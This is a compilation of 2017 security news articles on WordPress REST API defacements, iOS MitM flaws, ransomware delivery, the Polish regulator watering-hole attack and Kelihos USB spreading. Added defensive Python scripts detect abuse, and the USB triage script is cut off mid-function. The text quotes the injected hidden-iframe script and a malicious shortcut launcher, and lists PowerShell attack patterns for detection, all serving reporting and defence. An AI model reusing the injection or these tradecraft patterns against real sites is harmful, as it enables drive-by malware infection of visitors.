SecurityWeek has noticed that some of the compromised websites have also been re-defaced by a fifth actor. Fortunately, some of the affected sites have already been cleaned up and updated to WordPress 4.7.2.

While these attacks appear to be carried out mostly by script kiddies looking to boost their online reputation, researchers believe the vulnerability will be increasingly exploited for search engine poisoning.

“There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability,” explained Daniel Cid, CTO and founder of Sucuri.

The company’s WAF network has seen an increasing number of exploit attempts, reaching nearly 3,000 on Monday.

A recent report from Sucuri showed that more than half of the WordPress websites hijacked last year were outdated at the point of infection. By default, WordPress installations are updated automatically when a new version becomes available, but some administrators have disabled the feature, often due to concerns that the updates may break their websites.
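Both articles above leave an administrator with two questions: is my site on 4.7 or 4.7.1, and has anyone been writing to the posts endpoint of the REST API without logging in? The added example below (not Sucuri's or WordPress's code) answers both from data you already have: it reads the version from the generator meta tag WordPress emits, and it scans web server access logs for write requests (POST, PUT, PATCH, DELETE) aimed at `/wp/v2/posts`, whether addressed as `/wp-json/...` or through the `?rest_route=` query form WordPress also accepts. The HTML snippet and log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

FIXED_VERSION = (4, 7, 2)
GENERATOR_RE = re.compile(
    r'<meta\s+name="generator"\s+content="WordPress\s+([0-9][0-9.]*)"', re.I)
# Simplified combined-log prefix: ip ident user [time] "METHOD path proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
POSTS_ROUTE = re.compile(r"^/wp/v2/posts(?:/|$)")
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def parse_version(text: str) -> tuple:
    return tuple(int(part) for part in text.strip().split("."))


def version_is_affected(text: str) -> bool:
    """True for 4.7 and 4.7.1: the REST endpoints shipped in 4.7, the fix in 4.7.2."""
    version = parse_version(text)
    return version[:2] == (4, 7) and version < FIXED_VERSION


def extract_wp_version(html: str):
    match = GENERATOR_RE.search(html)
    return match.group(1) if match else None


def rest_route(request_path: str):
    """'/wp-json/wp/v2/posts/12' or '/?rest_route=/wp/v2/posts/12' -> '/wp/v2/posts/12'."""
    parts = urlsplit(request_path)
    if parts.path.startswith("/wp-json/"):
        return "/" + parts.path[len("/wp-json/"):]
    route = parse_qs(parts.query).get("rest_route")
    return route[0] if route else None


def suspicious_requests(lines) -> list:
    """Write requests to the posts endpoint; correlate with logged-in sessions afterwards."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        route = rest_route(match.group("path"))
        if match.group("method") in WRITE_METHODS and route and POSTS_ROUTE.match(route):
            hits.append({"ip": match.group("ip"), "ts": match.group("ts"),
                         "method": match.group("method"), "route": route,
                         "status": int(match.group("status"))})
    return hits


# Constructed samples, not data from a real site.
SAMPLE_HTML = '<head><meta name="generator" content="WordPress 4.7.1" /></head>'
SAMPLE_LOG = """\
203.0.113.9 - - [06/Feb/2017:14:02:11 +0000] "GET /wp-json/wp/v2/posts/12 HTTP/1.1" 200 4311 "-" "curl/7.47"
203.0.113.9 - - [06/Feb/2017:14:02:15 +0000] "POST /wp-json/wp/v2/posts/12 HTTP/1.1" 200 912 "-" "curl/7.47"
198.51.100.21 - - [06/Feb/2017:14:05:40 +0000] "POST /?rest_route=/wp/v2/posts/12 HTTP/1.1" 200 901 "-" "python-requests/2.12"
10.0.0.4 - - [06/Feb/2017:14:06:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    version = extract_wp_version(SAMPLE_HTML)
    print(f"WordPress {version}: {'AFFECTED' if version and version_is_affected(version) else 'not affected'}")
    for hit in suspicious_requests(SAMPLE_LOG.splitlines()):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['route']} -> {hit['status']}")
```

Editors working in the admin UI also POST to that endpoint, so a hit is a triage signal, not proof of compromise: check whether the client had a valid logged-in cookie, and whether the post's content changed in the same minute. The GET in the sample is ignored because reading posts through the API is public by design.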


Hackers Can Intercept Data From Popular iOS Apps

7.2.2017 securityweek Apple
Dozens of popular iOS applications are affected by vulnerabilities that allow man-in-the-middle (MitM) attackers to silently intercept data from connections that should be protected by TLS, a study has found.

The developers of verify.ly, a service designed for finding security issues in iOS apps, analyzed applications in the Apple App Store and identified hundreds that are likely vulnerable to data interception. The experts tested each of them on an iPhone running iOS 10 and confirmed that 76 were vulnerable.

According to Will Strafach, iOS security expert and developer of verify.ly, the affected applications have been downloaded more than 18 million times. The vulnerability is considered high risk in the case of 19 of the 76 applications, as they expose financial or medical service credentials or session authentication tokens.

The medium risk category includes 24 iOS apps, which also expose login credentials and session authentication tokens. The names of the high and medium risk apps have not been disclosed in order to give vendors time to patch the flaws.

Researchers identified 33 low risk applications, which allow attackers to intercept only partially sensitive information, including analytics data, email addresses, and login credentials that would only be entered on a trusted network. The list includes banking, VPN, entertainment, news, stock trading, chat, and Snapchat-related apps.

“This sort of [MitM] attack can be conducted by any party within Wi-Fi range of your device while it is in use. This can be anywhere in public, or even within your home if an attacker can get within close range,” Strafach explained. “Such an attack can be conducted using either custom hardware, or a slightly modified mobile phone, depending on the required range and capabilities. The best similar and well-understood form of attack to this would be the ability to read data from credit cards at a close range.”

Applications are vulnerable to these types of attacks due to the way their developers implement network-related code, which means only the developers can properly address the issue. However, end-users can protect themselves against potential attacks by utilizing the affected applications only over a cellular data connection, which is much more difficult to intercept compared to Wi-Fi.

An automated analysis of Android apps conducted back in 2014 by CERT/CC showed that thousands of applications were vulnerable to MitM attacks, and many of them are still vulnerable today.


76 Popular iOS apps are vulnerable to man-in-the-middle (MITM) attacks
7.2.2017 securityweek Apple

A study conducted on iOS mobile apps revealed that many of them are affected by security vulnerabilities that expose users to man-in-the-middle (MitM) attacks.
The study confirms that dozens of iOS apps are affected by vulnerabilities that could be exploited by hackers to mount man-in-the-middle (MitM) attacks and intercept data from connections even when they are protected by TLS.

The study was conducted by the developers of verify.ly, a service that analyzes iOS apps for security issues. The experts analyzed applications in the Apple App Store and identified hundreds that potentially expose mobile users to MitM attacks. Each was tested on an iPhone running iOS 10, and 76 were confirmed to be vulnerable.

The impact is serious if we consider that the affected applications account for more than 18 million downloads. The vulnerability is considered high risk in the case of 19 of the 76 applications. The applications expose sensitive data, including financial or medical service credentials or session authentication tokens.

“During the testing process, I was able to confirm 76 popular iOS applications allow a silent man-in-the-middle attack to be performed on connections which should be protected by TLS (HTTPS), allowing interception and/or manipulation of data in motion.” reads the blog post published by the researchers.

“According to Apptopia estimates, there has been a combined total of more than 18,000,000 (Eighteen Million) downloads of app versions which are confirmed to be affected by this vulnerability.”

Examining the key findings of the report we can see that:

the medium-risk category includes 24 iOS apps that expose login credentials and session authentication tokens.
the low-risk category includes 33 iOS apps that are affected by flaws that could be exploited by attackers to intercept only partially sensitive information such as email addresses and login credentials.
“This sort of attack can be conducted by any party within Wi-Fi range of your device while it is in use. This can be anywhere in public, or even within your home if an attacker can get within close range,” continues the post. “Such an attack can be conducted using either custom hardware, or a slightly modified mobile phone, depending on the required range and capabilities. The best similar and well-understood form of attack to this would be the ability to read data from credit cards at a close range.”

The security issues discovered by the experts are the result of lax adoption of secure coding practices in the apps' network code; only the developers can fix them. Until a fix is available, users of the affected iOS apps should avoid using them on Wi-Fi networks.


Phishme observed operators behind Locky and Sage ransomware share delivery infrastructure
7.2.2017 securityaffairs Virus

PhishMe security researchers discovered that the Locky and Sage ransomware were recently distributed through the same delivery infrastructure.
Cybercriminals commonly share delivery infrastructure to get the most out of their resources and keep costs down.

Recently the Locky ransomware was observed being distributed through the delivery infrastructure used to spread the Sage ransomware.

A couple of weeks ago, researchers from Cisco's security team noticed traces of traffic from the dormant Necurs botnet and warned of a possible new massive ransomware spam campaign.

Now researchers at PhishMe report that cybercriminals are sharing delivery infrastructure for both Sage and Locky, likely because the operators behind Locky are securing new distribution channels after the Necurs botnet, the main driver of Locky and Dridex activity, went quiet.

“Sage and Locky Ransomware Now Sharing Delivery Infrastructure in Phishing Attacks” is the title of the blog post published by PhishMe.

The Sage ransomware emerged only recently; malware researchers spotted it in December 2016 being spread through phishing messages carrying malicious attachments. The threat actors frequently changed tactics to evade spam filters, for example by using random numbers in email subjects in recent campaigns.

“Following this early distribution, threat actors moved toward the mainstream in a major way. The phishing email subjects used random numbers to help elude some basic filters and leveraged business-related themes rather than explicit or racy narratives. The body of these emails explained that a financial transaction had been rejected and claimed that details about the failure could be found in an attached document.” reads the analysis published by PhishMe.

Some of the distribution emails had no subject line and used the recipient's name as part of the attachment's file name. The attachment is a double-zipped archive containing a malicious Office document or .js file that launches the infection chain.

Other emails claimed to contain information about a financial transaction that had been rejected, or about a refund deposit that had failed because an order was cancelled.

“In this more polished campaign, the .zip file (named “document_1.zip”) contained a JavaScript application which, when run, facilitated the download of a Windows executable representing the Sage Ransomware to be downloaded.” continues PhishMe. “In this case, the payload binary was retrieved from the domain affections[.]top, however the payment gateway’s Tor site, as well as the unusual Tor2Web gateway addresses on er29sl[.]com and rzunt3u2[.]com remained the same.”

Starting on January 26, 2017, the experts noticed a phishing campaign delivering the Locky ransomware that had many similarities to the Sage campaign. On Monday, January 30, the researchers observed the domain affections[.]top being used as part of the Locky delivery infrastructure as well.

“This connection pushes the narrative forward in yet another way as the Locky distribution in question was yet another example of that ransomware being paired with the Kovter Trojan,” PhishMe notes.

Researchers at Microsoft have previously documented the link between Locky and Kovter: they detailed a technique in which the crooks first attempted to drop the Locky ransomware and, if that failed, switched to the Kovter malware.

The distribution of both threats, Sage and Locky, from the same delivery infrastructure led the experts to believe that the operators were likely using a distribution service offered in the criminal underground.

“First, the shared infrastructure provides a high-fidelity indicator of compromise that can be preemptively blocked to foil the delivery of multiple ransomware varieties. Secondly, since the qualitative tactics, techniques, and procedures used in the distribution of these ransomware varieties are nearly identical and closely resemble classic phishing narratives easily recognizable to users prepared and empowered to identify and report phishing emails,” added PhishMe.


Crooks hacked Polish banks with a malware planted on Government site
7.2.2017 securityaffairs Virus

Several Polish banks have confirmed that their systems were infected with malware after their staff visited the website of the Polish Financial Supervision Authority.
Polish banks are investigating a massive cyber attack after malware was spotted on several servers of the financial institutions.

The attack was first reported by Zaufana Trzecia Strona, a Polish news site, on Friday of last week.

The most interesting aspect of the attack is that the crooks used the website of the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.

A spokesman for the KNF confirmed that the regulator's internal systems had been compromised by hackers “from another country”. The attackers planted on those servers the malicious files that were used in the attacks against the Polish banks.

To stop the malware from spreading further, the authorities decided to shut down the entire KNF network “in order to secure evidence.”


The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.

The IT staff at the banks noticed anomalous traffic associated with the presence of executables on several servers.

“It has been a busy week in SOCs all over the Polish financial sector. At least a few of Poland's 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognized on some servers were the first signs of trouble,” reported the badcyber.com website. “A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise, [it] managed to share that information with other banks, who started asking their SIEMs for information. In some cases, the results came back positive.”

According to the first findings of the investigation, the attackers compromised the KNF's website and modified one of the site's JavaScript files.

Ironically the KNF is the regulating body that monitors and promotes security measures adopted by Polish banks.

The modified script caused visitors' browsers to load a hidden iframe from an external server; the content served through that iframe then downloaded the malware and installed it.

The unauthorized code was stored in the following file:

http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11
and looked like this (rejoined onto one line):

document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;'></iframe></div>");

The iframe is absolutely positioned 2144 pixels to the left of the viewport, so visitors never see it while their browser silently fetches the external page.
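A defender reviewing the regulator's scripts would want to catch exactly this kind of injection: a document.write that drops an iframe positioned thousands of pixels off-screen and pointing at a third-party host. The following Python script is an added example, not code from the article or from badcyber.com. It uses the snippet above, rejoined onto one line, as a constructed sample input and flags iframes that are hidden by CSS or size, or whose host is outside a list of first-party domains; the knf.gov.pl allowlist is an assumption.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input: the injected snippet as quoted in the article (rejoined
# onto one line) and a harmless document.write for contrast.
SAMPLES = {
    "accordian-src.js": (
        "document.write(\"<div id='efHpTk' width='0px' height='0px'>"
        "<iframe name='forma' src='https://sap.misapor.ch/vishop/view.jsp?pagenum=1' "
        "width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;'>"
        "</iframe></div>\");"
    ),
    "benign.js": "document.write('<p>Loading...</p>');",
}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s'">]+))""")
PX_RE = re.compile(r"^(-?\d+(?:\.\d+)?)(?:px)?$")


def parse_attrs(tag):
    """Map attribute names (lower-cased) to values for one <iframe ...> tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def parse_style(style):
    """Split 'a:b;c:d' inline CSS into a dict, lower-cased."""
    props = {}
    for decl in style.split(";"):
        if ":" in decl:
            k, v = decl.split(":", 1)
            props[k.strip().lower()] = v.strip().lower()
    return props


def px(value):
    """Numeric pixel value of '0px', '-2144px' or '145'; None if not a plain length."""
    m = PX_RE.match((value or "").strip().lower())
    return float(m.group(1)) if m else None


def hidden_reason(attrs):
    """Return why the iframe would be invisible to a visitor, or None if it is visible."""
    style = parse_style(attrs.get("style", ""))
    if style.get("display") == "none" or style.get("visibility") == "hidden":
        return "css-hidden"
    for side in ("left", "top"):
        v = px(style.get(side))
        if v is not None and v < -100:          # pushed far outside the viewport
            return f"offscreen-{side}={v:g}px"
    for dim in ("width", "height"):
        v = px(attrs.get(dim))
        if v is None:
            v = px(style.get(dim))
        if v is not None and v <= 1:             # zero/one-pixel frames
            return f"zero-{dim}"
    return None


def find_suspicious_iframes(js_source, first_party_hosts):
    """Flag iframes that are hidden and/or point at a host outside first_party_hosts."""
    findings = []
    for tag in IFRAME_RE.findall(js_source):
        attrs = parse_attrs(tag)
        src = attrs.get("src", "")
        host = (urlsplit(src).hostname or "").lower()
        reason = hidden_reason(attrs)
        third_party = bool(host) and not any(
            host == h or host.endswith("." + h) for h in first_party_hosts)
        if reason or third_party:
            findings.append({"src": src, "host": host,
                             "hidden": reason, "third_party": third_party})
    return findings


if __name__ == "__main__":
    for name, source in SAMPLES.items():
        print(name, find_suspicious_iframes(source, ["knf.gov.pl"]))
```

Run it against a checkout of the site's static JavaScript as a pre-deployment check, or diff the output between the deployed copy and the copy in version control; a hidden, third-party iframe appearing in a file that should only define UI behaviour is a strong indicator of a watering-hole injection like this one.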
At the time of writing, both the KNF and the Polish government had confirmed that there is no indication that the crooks stole money from the banks.

“Significantly, so far we do not have any information about a successful or unsuccessful attempt, related to these attacks, to steal funds from bank accounts. This may indicate that the goal of the attackers was information, not money,” reported the local news site zaufanatrzeciastrona.pl. “In at least one case, it is known that a large amount of data has been transferred from the bank’s network to external servers, but because the criminals encrypted the data before sending it, determining what was stolen may be difficult.”

The one certainty is that the incident may well be the largest hack ever of the country's financial sector.

The IOCs are available on the badcyber.com website.


Polish Banks Hacked using Malware Planted on their own Government Site
7.2.2017 thehackernews Crime

In what is considered to be the largest system hack in the country's history and a massive attack on the financial sector, several banks in Poland have been infected with malware.
What's surprising? The source of the malware infection is their own financial regulator, the Polish Financial Supervision Authority (KNF) -- which, ironically, is meant to keep an eye out for the safety and security of financial systems in Poland.
During the past week, the security teams at several unnamed Polish banks discovered malicious executables on their workstations.
The KNF confirmed that their internal systems had been compromised by someone "from another country," although no specifications were provided.
After suspicious files that were infecting various banking systems were found to have been downloaded from the regulator's servers, the KNF decided to take down its entire system “in order to secure evidence.”
Here's what happened:

An unknown attacker compromised the KNF's website for well over a week by modifying one of the site's JavaScript files, making visitors to the regulator's site load the malicious JavaScript file, which then downloaded the malicious payloads.
Once downloaded and executed, the malware connected to some foreign servers to perform various malicious tasks such as reconnaissance, data exfiltration, and post exploitation.
The malware appears to be a new strain that had never been seen before in live attacks and, at the time, had a zero detection rate on VirusTotal.
In some cases, the attackers even managed to gain control over critical servers within the targeted bank's infrastructures.
Security blogger BadCyber spoke to several banks; at least a few of Poland's twenty-odd commercial banks have already confirmed being victims of the malware infection, while others are still checking.
The affected banks discovered the encrypted executables on several servers, together with unusual network traffic going to uncommon IP addresses in foreign countries.
Both the KNF and the Polish government told local Polish media that the investigation is ongoing and that there is no indication that customers' money was affected or that any operations were disrupted.


US Judge Ordered Google to Hand Over Emails Stored On Foreign Servers to FBI
7.2.2017 thehackernews Security

In a world of mass surveillance not only by the US but by intelligence agencies across the globe, every country wants tech companies including Google, Apple, and Microsoft to set up and maintain servers within its borders so that its citizens' data stays inside them.
Last year, Microsoft won a case which ruled that the US government cannot force tech companies to hand over their non-US customers' data stored on servers located in other countries to the FBI or any other federal authorities.
However, a notable new ruling runs counter to last year's judgment, raising concerns about people's privacy.
A US magistrate reportedly ruled Friday that Google has to comply with FBI search warrants seeking customer emails stored on servers outside of the United States, according to Reuters.
U.S. Magistrate Judge Thomas Rueter in Philadelphia noted that transferring emails from outside servers so FBI could read them locally as part of a domestic fraud probe didn't qualify as a seizure because there's "no meaningful interference" with the account holder's "possessory interest" in the data sought.
Here's what Judge Rueter says:
"Google regularly transfers user data from one data center to another without the customer's knowledge. Such transfers do not interfere with the customer’s access or possessory interest in the user data. Even if the transfer interferes with the account owner's control over his information, this interference is de minimis [minimal] and temporary."
In August 2016, the search engine giant was ordered to comply with two FBI search warrants related to criminal investigations, but Google provided only the data stored on its US servers.
So, the government filed a motion to compel Google to hand over the rest of the information to the FBI.
When the company cited last year's ruling in Microsoft's favor by the US Court of Appeals for the Second Circuit in a similar case, the judge replied that Google handles its foreign-stored data in a way that makes it impossible for the US government to ask a specific foreign state for legal assistance.
However, Google made it clear that a search warrant, if granted, can give the government access to email content, while subpoenas and court orders only let them access non-content data, like an account creation number, phone number, and sign-in IP address.
According to the new ruling, the search engine giant receives over 25,000 requests every year from United States authorities for disclosures of user data in criminal matters.
Google is obviously unhappy with the result and intends to fight it.


Carbon Black Unveils "Streaming Prevention" to Thwart Attacks in Progress

7.2.2017 securityweek Virus
New Streaming Prevention Technology Collects, Correlates and Analyzes Endpoint Events in Real-time to Detect and Stop Attacks In Progress

Malicious attacks are increasingly leveraging non-malware methodologies. Already, 53% of attacks do not use malware; and it is estimated that over the next 90 days, one-third of organizations will face a non-malware attack. It is claimed that these attacks will likely succeed because current AV technology, whether first-gen or second-gen machine learning technology, is focused almost entirely on detecting a malicious file dropped on the endpoint.

To combat this new attack vector, Carbon Black has today announced its new Streaming Prevention technology. Carbon Black CTO Mike Viscuso talked to SecurityWeek to explain why this new approach is necessary, and how it works.

Viscuso described standard AV as 'point-in-time' prevention, and illustrated it with an example from the NSA. Since the NSA is offensive as well as defensive, it checks its own tools against standard defenses. When a new McAfee product was launched, it was tested against NSA tools and succeeded in blocking one of them: a tool that spun up a command shell that could be used remotely. To get past it, the NSA operators simply renamed the command shell to something else, and it worked.

The point, explained Viscuso, is that most anti-malware products look for 'points', usually files. They do not look for behavior in context. If the attacker does not drop a file that can be analyzed, or if it involves something not recognized by the defense, it is simply allowed. "Many of the big breaches in recent years, Yahoo, Oracle and DNC, for example, all resulted from a non-malware attack."

This new attack approach leverages the existing power of the operating system. It uses trusted OS tools such as PowerShell and WMI to do the work. He gave an example: "A compromised website could require Flash. Flash could be exploited to run PowerShell. PowerShell would conduct the attack." There is, he says, nothing in this process for contemporary anti-malware products to detect and prevent.
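The Flash-to-PowerShell chain described above is exactly the kind of sequence that file-centric scanning misses but a process-lineage rule catches: nothing malicious is written to disk, yet a scripting host being spawned underneath a browser plug-in is itself the anomaly. The following Python script is an added example, not Carbon Black's product or code; it runs a simple ancestry rule over constructed process-creation events (not real telemetry) and scores the command line for common PowerShell tradecraft. The process names, the placeholder -enc payload and the score threshold are assumptions.

```python
import ntpath

# Processes from which a scripting host should not normally be spawned: browsers,
# their plug-in containers and Office applications (the "Flash -> PowerShell" path).
EXPOSED_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "plugin-container.exe",
                   "winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}
EXPOSED_PREFIXES = ("flashplayerplugin",)   # versioned names such as FlashPlayerPlugin_24_0_0_194.exe
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "regsvr32.exe", "rundll32.exe", "cmd.exe"}
SUSPICIOUS_ARGS = ("-enc", "-w hidden", "-nop", "downloadstring", "iex ", "bypass")

# Constructed sample telemetry (not real data): pid 400 is the exploit chain, pid 500
# is an administrator's scheduled PowerShell script that must not alert.
EVENTS = [
    {"ts": 1, "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"ts": 2, "pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": "iexplore.exe http://example.invalid/"},
    {"ts": 3, "pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_24_0_0_194.exe",
     "cmdline": "FlashPlayerPlugin_24_0_0_194.exe -plugin"},
    {"ts": 4, "pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUFBQQ=="},   # placeholder payload
    {"ts": 5, "pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]


def image_name(image):
    """Lower-cased file name of a Windows image path, regardless of host OS."""
    return ntpath.basename(image).lower()


def is_exposed(name):
    return name in EXPOSED_PARENTS or name.startswith(EXPOSED_PREFIXES)


def ancestry(by_pid, pid, max_depth=8):
    """Process chain, child first, following ppid links; bounded so pid reuse
    or a broken tree cannot loop forever."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Alert on any script host whose ancestry passes through an exposed parent.
    The score grows with command-line tradecraft (encoded command, hidden window...)."""
    by_pid = {e["pid"]: e for e in sorted(events, key=lambda e: e["ts"])}
    alerts = []
    for e in events:
        name = image_name(e["image"])
        if name not in SCRIPT_HOSTS:
            continue
        chain = ancestry(by_pid, e["pid"])
        origin = next((p for p in chain[1:] if is_exposed(image_name(p["image"]))), None)
        if origin is None:
            continue
        cmd = e["cmdline"].lower()
        score = 2 + sum(tok in cmd for tok in SUSPICIOUS_ARGS)
        alerts.append({
            "pid": e["pid"],
            "origin": image_name(origin["image"]),
            "chain": [image_name(p["image"]) for p in reversed(chain)],
            "score": score,
            "action": "block" if score >= 4 else "alert",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

A real sensor keys the table by (pid, creation time) rather than pid alone, because pids are recycled, and evaluates the rule as each creation event arrives rather than over a finished list; the lineage logic is the same.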

"Anti-malware products," he explained, "are very focused on malicious software; that is, malware. When a new file gets put onto your system, anti-malware will scan it to determine whether it thinks it is malicious or not. It is very point-in-time. But the reality is that attackers are increasingly not using malware. They've got much more sophisticated -- but so has technology. We're leveraging new technology that has been very successful in other industries -- called event stream processing -- to look at the full history of what this system or process or set of processes has been doing."

Carbon Black's Streaming Prevention has grown out of the event stream processing developed for algorithmic trading. A simple algorithm could tell a trader to buy a particular stock at one price and to sell at another price. But if the entire market is moving, those point-in-time instructions could be bad advice. What is necessary for the algorithm is a deeper understanding of the entire market.

"It needs more data," said Viscuso. "So, a technology called event stream processing was developed which allowed the consumption of millions and millions of data points, and had the ability to analyze them very rapidly in order to make the right decision; and to further allow the algorithm to update itself, in milliseconds, over and over again in a loop, so that it can make better and better decisions over time."

This, he said, is the basis of Streaming Prevention. It applies machine learning and network anomaly techniques to the endpoint. It examines and tags TTPs (tactics, techniques and procedures) used in malicious activities, and analyzes them in context. "It is continuously learning from what it sees, and has seen in the past, when a certain sequence of events could lead to a breach. It can then apply a risk decision on that sequence of events to determine whether it is an attack or not. Over time, this risk decision gets more and more accurate and perceptive; and over time it will learn how to prevent all non-malware attacks."

Streaming Prevention is a cloud service. The analysis is conducted in the cloud and the result of the analyses pushed down to the endpoint so the endpoint acts independently. But data is gathered from all client endpoints and streamed up to the cloud. "The results are then shared with all customers so they are protected against local attacks and also new attacks happening elsewhere." Endpoints, he added, can now be protected against both malware and non-malware attacks.

In October 2016, Carbon Black announced a partnership with IBM Security that will allow Carbon Black endpoint threat data to feed into IBM's BigFix for instant attack remediation.

As a company, Carbon Black has more than 600 employees and is a result of Bit9 merging with Carbon Black in February 2014. In October 2016, The Wall Street Journal reported that Carbon Black has made a confidential IPO filing under the JOBS Act.


InterContinental Confirms Card Breach at 12 Hotels

7.2.2017 securityweek Crime
British multinational hotel company InterContinental Hotels Group (IHG) confirmed on Friday that systems processing payments for some of its properties in the Americas region have been breached by cybercriminals.

The company launched an investigation in late December, following reports of a fraud pattern on credit and debit cards used at some of its hotels, particularly ones operating under the Holiday Inn and Holiday Inn Express brands.

Cyber security firms investigating the incident found malware on servers that processed payment cards at the bars and restaurants of 12 properties managed by IHG. Cards used at front desks are not affected.

The malware infected servers between August and December 2016, and it was designed to steal track data (i.e. cardholder name, card number, expiration date and verification code) as it passed through the compromised system. The company has not provided any information about the number of affected cards.

The list of impacted hotels includes Crowne Plaza San Jose-Silicon Valley, Holiday Inn San Francisco Fisherman’s Wharf, InterContinental Los Angeles Century City, InterContinental Mark Hopkins in San Francisco, InterContinental San Francisco, InterContinental Buckhead Atlanta, InterContinental Chicago Magnificent Mile, InterContinental The Willard in Washington D.C., Holiday Inn Nashville Airport, Holiday Inn Resort in Aruba, InterContinental Toronto Yorkville in Canada, and InterContinental San Juan Resort & Casino in Puerto Rico.

“We have been working with the security firms to review our security measures, confirm that this issue has been remediated, and evaluate ways to enhance our security measures,” IHG told customers. “We have also notified law enforcement and are working with the payment card networks so that the banks that issue payment cards can be made aware and initiate heightened monitoring on the affected cards.”

IHG hotels were affected by at least two other data breaches last year. Kimpton Hotels & Restaurants informed customers in August that hackers had access to its payment systems between February and July, and InterContinental hotels were also involved in an incident that impacted HEI Hotels & Resorts.

Other hospitality businesses that recently suffered a data breach include Noodles & Company, Hard Rock Hotel & Casino Las Vegas, Trump Hotels, Millennium Hotels & Resorts and Omni Hotels.


Kelihos Spreads via USB Drives

7.2.2017 securityweek Virus
Kelihos, the malware behind one of the longest standing botnets out there, was recently observed spreading via infected thumb drives, researchers have discovered.

The Kelihos botnet has been around for many years, and even survived takedown attempts over half a decade ago. Last year, the botnet’s activity ramped up as tens of thousands of new bots were added to it. Kelihos was being used for the distribution of MarsJoke, Wildfire, and Troldesh ransomware and various Trojans, including Panda Zeus, Nymain and Kronos.

The botnet is rented out under the “spam as a service” business model and continues to geo-target its victims. The latest campaign sent users in Canada links to Tangerine Bank phishing pages, while recipients with “.kz” email addresses received a link to the Ecstasy adult website, Arsh Arora, malware analyst and Ph.D. researcher at The University of Alabama at Birmingham, discovered.

The emails, sent with the subject line “TANGERINE online account has been suspended” (Tangerine being the Canadian online bank formerly known as ING Direct), contain an HTML page that tries to get the recipient to click a “Learn More” button. The button leads to a phishing site that asks the victim to “verify” their information, in an attempt to steal their credentials.

Geo-targeting of addresses ending in “.kz” is new for the Kelihos botnet, the researcher notes. That spam message, which carried a Russian-language subject line, directed users to an adult site (www[dot]almatinki[dot]com).

The most interesting part of the attack, however, is the fact that the removable drives attached to the compromised machines would be infected with a copy of the original Kelihos binary. The security researcher says that the malware was written to a thumb drive connected to the virtual machine that was infected as part of the new campaign.

Saved on the thumb drive under the name “porn.exe,” the executable is hidden from the user, as are a few shortcuts that were not present on the removable device before. The file, the security researcher says, is the Kelihos bot itself.

The researcher also observed that the CreateFile API call was associated with the dropped executable: the malware attempts to open several files with CreateFile and, if that fails, falls back to creating the .exe file and writing the malicious binary to it. Next, it creates shortcuts for the hidden directories and for the executable.

“An Autorun.inf is not created to run this file, however, a shortcut to the file with the command C:\WINDOWS\system32\cmd.exe F/c ‘start %cd%\porn.exe’ can be found on the drive, as well as shortcut to several other hidden directories on the drive (not malicious),” the security researcher says.

When the executable runs, it behaves just like a normal Kelihos sample. The researcher, however, was not yet able to infect a new drive from that copy, so further investigation is required to reveal the specific mechanism the malware uses for infection, especially since the executable appears identical to the original binary.
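The artefacts described above (an executable at the root of the drive plus .lnk shortcuts whose command line is cmd.exe /c start %cd%\porn.exe) are easy to triage without a full ShellLink parser. The following Python script is an added example, not the researcher's tooling; it lists executables on a mounted drive and flags any shortcut whose raw bytes, checked both as ASCII and as UTF-16LE (which is how .lnk files store their strings), contain a cmd.exe/start launcher or reference an executable present on the drive. The sample drive it builds is constructed: its .lnk is a byte-level mock with a real ShellLink header prefix, not a valid shortcut, and because the hidden attribute cannot be set portably, hidden reports False except on Windows.

```python
import re
import shutil
import stat
import tempfile
from pathlib import Path

EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}
# ShellLink header prefix: HeaderSize 0x4C followed by the start of the LinkCLSID.
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00"
EXE_NAME_RE = re.compile(r"[\w.\-]+\.exe", re.IGNORECASE)


def is_hidden(path):
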